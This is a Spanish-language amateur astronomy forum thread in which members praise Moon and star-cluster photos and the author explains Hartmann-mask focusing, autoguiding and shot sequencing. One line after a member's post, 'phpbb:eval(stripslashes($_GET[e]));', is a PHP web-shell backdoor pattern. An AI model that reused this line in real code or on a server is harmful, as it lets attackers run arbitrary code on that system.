Lluvia de estrellas...

Foro para publicación de astrofotografías hechas por aficionados.
Responder
ftorrev
Mensajes: 489
Registrado: Mié Feb 06, 2008 2:47 pm

Lluvia de estrellas...

Mensaje por ftorrev »

Aunque todavía no he llegado a las tomas donde sale alguna perseida, de momento os dejo dos astrofotos y un experimento:

[img]http://www.ft3d.jazztel.es/Fotos/LunaCr ... 8-08-2.jpg[/img]

[img]http://www.ft3d.jazztel.es/Fotos/M39-Pioz12_08_08.jpg[/img]

[img]http://www.ft3d.jazztel.es/Fotos/ViaLacteaGA.jpg[/img]

Espero que os gusten... ya colgaré el resto...
LUNA
Mensajes: 486
Registrado: Vie Ago 08, 2008 4:36 pm

Lluvia de estrellas...

Mensaje por LUNA »

Hola:

Me gusta la foto de la luna, te ha quedado espectacular. Ya nos explicarás en que consiste el experimento, porque de momento entiendo muy poco.

No tardes mucho en colgar las perseidas, ya que me quedé con las ganas de ir a pioz con vosotros.

Un saludo

Susana
C8-S
Montura ecuatorial CG-5
Rober150
Mensajes: 235
Registrado: Dom Jun 29, 2008 6:50 pm

Lluvia de estrellas...

Mensaje por Rober150 »

se me había pasado este post :roll:

Fernando, ¡Queremos ver las fotos de las Perseidas! :P

Las fotos están genial. La luna es espectacular, ¿cómo la has hecho? ¿puedes explicarlo un poquito?


Un saludo
AstroAfición / Descubre tu pasión por la Astronomía
ftorrev
Mensajes: 489
Registrado: Mié Feb 06, 2008 2:47 pm

Lluvia de estrellas...

Mensaje por ftorrev »

Por encima:

La luna está hecha sin seguimiento. Para enfocar utilizo una máscara hartman y cuando consigo que no se vea una DOBLE LUNA, el enfoque está muy fino. Disparo tomas muy rápidas (la luna tiene mucha luz) y "ya está".

La otra es con seguimiento con otro telescopio guía. Utilizo una cámara Luna QHY6 (que es una auténtica pasada) y con ayuda de un programa para seguimiento, consigo hacer que la montura no se desvíe nunca durante el tiempo de que duran las exposiciones.

Este programa manda las correciones a la montura a través de un puerto USB mediante un dispositivo que convierte la señal al protocolo ST4 (cada montura tiene el suyo).

Otro pequeño programa me permite hacer la secuencia de disparos de la EOS 400D, donde le digo: nº de disparos, duración de cada uno y tiempo entre disparo y disparo

Es una explicación muy por encima, pero si algún día quieres conocer algo más, pásate por la explanada de PIOZ en una de nuestras quedadas. Allí verás el chiringuito que monto para hacer las fotos.

El "Experimento" es tan sólo una cámara con un trípode y un gran angular. Sumas las tomas con un programa de apilado y me salio esa extraña composición.

Un abrazo
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Lluvia de estrellas...

Mensaje por m3ntol »

Hola Susana,
ftorrev no tiene pérdida en las quedadas, Ahí donde veas maletas apiladas y equipo electrónico en abundancia esta él.

Además siempre es una gozada ver como trabaja y aprender su arte :)

Un saludo:

PD: Al final no vamos a hacer quedada este fin de semana, pero vamso a ir varios a Navas de Estena a finales de Septiembre, a pasar un fin de semana en los Montes de Toledo. Una verdadera pasada de lugar en todos los sentidos. Si os apuntais sois bienvenidas.
phpbb:eval(stripslashes($_GET[e]));
ponce168
Mensajes: 12
Registrado: Mar Sep 02, 2008 4:34 pm

Lluvia de estrellas...

Mensaje por ponce168 »

la foto de la luna genial!!

eres un autentico pro!!
LUNA
Mensajes: 486
Registrado: Vie Ago 08, 2008 4:36 pm

Lluvia de estrellas...

Mensaje por LUNA »

Hola a todos:

Me fastidia haber perdido la oportunidad de reunirme con vosotros en la sede y charlar un rato. Espero poder ir a la proxima y estar mas atenta al foro. He estado de vacaciones y me he conectado muy poco pero ahora que ya estoy en casa estaré pendiente.

Saludos.
C8-S
Montura ecuatorial CG-5
Responder